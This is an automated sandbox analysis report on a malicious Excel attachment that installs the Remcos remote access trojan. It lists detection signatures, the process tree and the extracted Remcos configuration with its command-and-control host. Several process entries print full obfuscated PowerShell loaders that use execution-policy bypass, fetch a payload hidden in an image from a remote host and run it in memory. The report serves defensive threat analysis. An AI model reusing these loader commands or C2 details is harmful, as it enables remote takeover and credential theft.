Windows Analysis Report
037002451082_10142024.xls

Overview

General Information

Sample name: 037002451082_10142024.xls
Analysis ID: 1533041
MD5: 0a3e3fee911e89820e0f428e31f8e0ac
SHA1: 0000692437d8054df2c2ded80c4c35f6de07a6a0
SHA256: 8087bbe34f6bd622a82115c7653470d15ec77183b5cb82e1996fb170b1ace01f
Tags: xls, user-abuse_ch
Infos:

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs a global keyboard hook
Installs new ROOT certificates
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Obfuscated command line found
PowerShell case anomaly found
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3184 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3456 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 3556 cmdline: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'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'+[ChAr]0X22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • powershell.exe (PID: 3668 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • csc.exe (PID: 3760 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          • cvtres.exe (PID: 3768 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3EB6.tmp" "c:\Users\user\AppData\Local\Temp\sknmngfy\CSCD0FFB283197417ABFDFF0C5A9D2FBA3.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • wscript.exe (PID: 3860 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" MD5: 045451FA238A75305CC26AC982472367)
          • powershell.exe (PID: 3904 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
            • powershell.exe (PID: 3996 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • RegAsm.exe (PID: 1884 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
                • RegAsm.exe (PID: 1052 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yrecugakrnvunuylxcgmffi" MD5: 8FE9545E9F72E460723F484C304314AD)
                • RegAsm.exe (PID: 3332 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jurvurlefvnzyimponaoqrckug" MD5: 8FE9545E9F72E460723F484C304314AD)
                • RegAsm.exe (PID: 3408 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\toxfvjwftdfeaoitxynhtwpbdvhxj" MD5: 8FE9545E9F72E460723F484C304314AD)
    • mshta.exe (PID: 2764 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 3040 cmdline: "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'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'+[ChAr]0X22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • powershell.exe (PID: 3044 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • csc.exe (PID: 2852 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lrugk233\lrugk233.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          • cvtres.exe (PID: 1060 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8131.tmp" "c:\Users\user\AppData\Local\Temp\lrugk233\CSC866FCE414411468EBBBEC22B5654CE3.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • wscript.exe (PID: 3568 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" MD5: 045451FA238A75305CC26AC982472367)
          • powershell.exe (PID: 3392 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD 
MD5: A575A7610E5F003CC36DF39E07C4BA7D)
            • powershell.exe (PID: 3732 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • RegAsm.exe (PID: 2292 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "idabo.duckdns.org:6875:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-I89M3S", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |

Source | Rule | Description | Author | Strings
00000014.00000002.650605085.00000000022DE000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown |
  • 0x6c4b8:$a1: Remcos restarted by watchdog!
  • 0x6ca30:$a3: %02i:%02i:%02i:%03i

Source | Rule | Description | Author | Strings
14.2.powershell.exe.12d21a28.0.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
14.2.powershell.exe.12d21a28.0.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
14.2.powershell.exe.12d21a28.0.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
14.2.powershell.exe.12d21a28.0.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown |
  • 0x690b8:$a1: Remcos restarted by watchdog!
  • 0x69630:$a3: %02i:%02i:%02i:%03i
14.2.powershell.exe.12d21a28.0.unpack | REMCOS_RAT_variants | unknown | unknown |
  • 0x6310c:$str_a1: C:\Windows\System32\cmd.exe
  • 0x63088:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x63088:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x63588:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x63db8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x6317c:$str_b2: Executing file:
  • 0x641fc:$str_b3: GetDirectListeningPort
  • 0x63ba8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x63d28:$str_b7: \update.vbs
  • 0x631a4:$str_b9: Downloaded file:
  • 0x63190:$str_b10: Downloading file:
  • 0x63234:$str_b12: Failed to upload file:
  • 0x641c4:$str_b13: StartForward
  • 0x641e4:$str_b14: StopForward
  • 0x63c80:$str_b15: fso.DeleteFile "
  • 0x63c14:$str_b16: On Error Resume Next
  • 0x63cb0:$str_b17: fso.DeleteFolder "
  • 0x63224:$str_b18: Uploaded file:
  • 0x631e4:$str_b19: Unable to delete:
  • 0x63c48:$str_b20: while fso.FileExists("
  • 0x636c1:$str_c0: [Firefox StoredLogins not found]

                  System Summary

                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydElu
                  Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3184, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\networkthinkinggreatthingstobeenough[1].hta
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . 
((gV '*MdR*').Name[3,11,2]-JoIN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, 